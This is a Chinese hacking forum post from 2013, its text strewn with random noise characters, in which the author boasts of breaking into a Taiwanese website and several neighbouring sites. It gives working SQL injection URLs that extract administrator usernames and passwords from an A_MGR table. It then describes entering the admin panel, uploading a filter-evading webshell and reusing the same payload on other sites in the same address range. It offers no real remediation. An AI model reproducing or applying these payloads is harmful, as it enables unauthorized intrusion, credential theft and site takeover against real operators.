发现一个注入点
3 q. `% {& R0 `" v% D" ihttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI20120506105833896 X/ n5 Y& ~/ M: Y
5 s" c1 W- O. g: z; P5 L
习惯性的加’having1=1--
% j# o3 a( z' |% O5 ?& Y. G
3 V0 y8 }) [' A/ {# |7 A( c% Zhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
! Q7 a3 [$ e) w. @. Z) \7 e9 _& f* i i+ @" U8 ]" y0 M9 o2 c+ R
0
9 U9 k6 C3 y" Y4 N
+ }# a0 h8 h7 \0 E( J" G爆出Diary_A.dl_Title(这时候很激动啊)& G# P6 u9 d% C; c: P1 V6 S, L
% z' o" v! H+ A2 U那么继续. a+ b- R& g& T0 O( Q- p$ z. @3 }& v
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—: E3 e, v. ~# k) M! u$ h' [
# t' x2 O% a2 b) f/ g# }& Y
继续,一直爆下去1 O# s8 f2 V+ j/ D! {) w
7 m/ Y( h1 n3 E) N/ E8 n& l* U
爆到几个字段和表段 但是没找到需要的管理用户的字段
" o! q/ z8 F- ~4 |& l! a6 w" g6 x1 h' q
蛋疼了 怎么办 然后去后台登陆页看源码7 p" z6 q3 _! Z6 ]8 Z- l m
! Y: o* F% q2 U3 E# D# @, D0
, i" I9 w# k+ S6 U: o' J$ {# G& E) ]& s, T2 ~
Input name= “ADUID”
4 _6 T( C% d* e# r2 hInput name= “ADPWD”& t) q* [8 ?6 X
2 F- c+ T6 I8 n' C* ` H3 L很幸运 找到了字段那就继续
" U" o; k1 u( u% M7 w找到之后开始爆用户$ [/ f4 m5 ^- z8 W7 _
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—6 k$ Z- L/ ?# C1 b1 ~: N
爆密码
N/ {7 E% @. K8 W2 C$ fhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—# u6 v3 o" i3 Q1 n
测试了下 这个注入点只能爆到文章哪里的表 % s& \* c& h3 N* x# E' e
' I5 g6 M% m" z, M5 h2 u4 I3 u
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了! {* u- I- v! a: o4 N
/ c) r' s$ H( \/ [ V
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
& i% a6 a* u: E: H9 B5 n3 X) j# i) B! V# J; `2 ?: }; [7 o! j# |) D
473
2 R; ~4 c2 Z, @) }. B2 h3 w* n1 _- C% ?9 A i9 M' R
进后台
5 `+ h a& p ~" C2 a
2 f) k" h% Q$ d S4 y
9 N, L1 C/ \8 P发现几个上传点 有的地方不能上传 而且防止恶意代码( t3 g2 B) @# h6 b
1 r8 U4 b$ b5 u) ~$ U& L# _没办法 各种百度各种找大牛 找到一只好像可以突破的马, \3 S' V8 E5 _4 N9 @# U
+ t. x. s2 V, @6 o0 x, M+ V# q7 B5 X0 l& Q: K3 ]+ b6 F1 {
在系统管理那里直接上传 不过没有显示地址 {& @7 ?( c5 U* `
; Y. n9 j; o/ {1 k; R再上传一次 抓包 搞定OK' m5 w) ^& {0 r
6 x5 X" z) M; S
: g& k) \' L7 a4 q* g
( @) @( O& Y, o! D3 A; p472
% V3 G: |4 f8 ~; L' k% p$ ]! B" [- I
晚上不行了 去睡觉。。。
( z! Y% ^/ N8 V, Z第二天刚起床 闲的没事做继续日站吧 & p- M1 h3 T, Q1 ^
7 D1 V+ T5 M7 Y2 L% M
找个站 就把这个站的旁c扫了下
4 I* O9 i x/ _
$ j8 Z5 V( a) l, i- Q- {4 p发现c段也有一个购物站 ,然后还和这个站的模板差不多
% _, z% o! Q: y# B) d" ]8 i( J
: b2 s1 X) K( T* U5 `就找到会员登录口测试0 B* w: I- g5 M6 q$ @- s& }) L3 N, D
1 y' d, }7 q: H) X A J' y" A'and (select top 1 MGR_UID from A_MGR)>0—& x8 g2 D3 T' }+ i
果断爆到了 这时候我很激动 通杀4 r( t* a) Q* m6 e* ^
9 f v! m( t9 {- Y! |" r% d" k再次翻c段( q) ?" ?, @& S+ Z9 C
; A! s& ]: C- i" I4 z5 D翻出几个站 都成功拿下
$ l7 X3 e i, [) }; A. E$ a$ C- n) l
+ R. Z$ F9 m7 i- F5 v; n( Y% R* Y0 D5 }0 v
9 F* @" y% p+ O. K/ J- R
修复方案:
) i6 H; s( D6 @他们比我专业 ' b; z/ M, U0 t, W. F
$ K; p- ?0 e8 P) c. d" Q
# E$ J/ S3 s5 N, _" ^9 R" d3 t5 c! Y3 A: h% ^7 N1 I# @8 s
|
发表于 2013-4-4 17:40:38
收藏
支持
反对